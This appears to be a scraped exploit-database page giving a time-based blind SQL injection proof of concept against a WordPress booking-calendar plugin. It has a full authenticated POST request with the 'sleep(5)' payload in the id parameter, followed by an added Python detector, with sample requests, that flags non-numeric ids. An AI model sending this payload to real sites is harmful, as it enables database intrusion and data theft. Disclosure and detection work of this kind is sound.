## https://sploitus.com/exploit?id=WPEX-ID:C5569317-B8C8-4524-8375-3E2369BDCC68
Edit an existing Seasons & Calendars entry (/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars) and tamper with the id parameter:

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://192.168.9.32
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test&maxAvailabilities=1&maxUnits=5&pricePreset=9000&minimumStayPreset=1&partlyBooked=1&page_id=0&infotext=
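
A detection-side check for the request above, added here as an example and not part of the original page or the plugin's code: it parses a raw request to `admin-post.php` and flags an `abc_booking_editCalendar` submission whose `id` is missing, repeated, or not a plain decimal integer. The function names and the rule that ids are at most ten ASCII digits are assumptions; the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Both names come from the request on the page.
WATCHED_ACTION = "abc_booking_editCalendar"
WATCHED_PARAM = "id"
# Assumption: a calendar id is a small unsigned integer. [0-9] is ASCII-only, unlike \d.
DECIMAL_ID = re.compile(r"[0-9]{1,10}")


def split_request(raw):
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    return method.upper(), urlsplit(target).path, body.strip()


def check_request(raw):
    """Return None when out of scope or clean, otherwise a finding string."""
    method, path, body = split_request(raw)
    if method != "POST" or not path.endswith("/wp-admin/admin-post.php"):
        return None
    # parse_qs decodes '+' and %XX, so encoded variants are judged in decoded form.
    form = parse_qs(body, keep_blank_values=True)
    if WATCHED_ACTION not in form.get("action", []):
        return None
    values = form.get(WATCHED_PARAM, [])
    if len(values) != 1:  # missing or repeated parameter
        return f"{WATCHED_PARAM}: expected exactly one value, got {len(values)}"
    if not DECIMAL_ID.fullmatch(values[0]):
        return f"{WATCHED_PARAM}: non-numeric value {values[0]!r}"
    return None


def make_request(body):
    return ("POST /wp-admin/admin-post.php HTTP/1.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)


# Constructed samples; the tampered value is the one shown on the page.
SAMPLES = {
    "clean": make_request("action=abc_booking_editCalendar&id=1&name=test"),
    "page_poc": make_request("action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test"),
    "encoded": make_request("action=abc_booking_editCalendar&id=1%20and%20sleep%285%29"),
    "duplicate": make_request("action=abc_booking_editCalendar&id=1&id=1+and+sleep(5)"),
    "other_action": make_request("action=something_else&id=abc"),
}

if __name__ == "__main__":
    print({k: check_request(v) for k, v in SAMPLES.items()})
```

The same strict-integer rule belongs in the server-side handler itself; a log or proxy check like this one only shows where tampered values have been submitted.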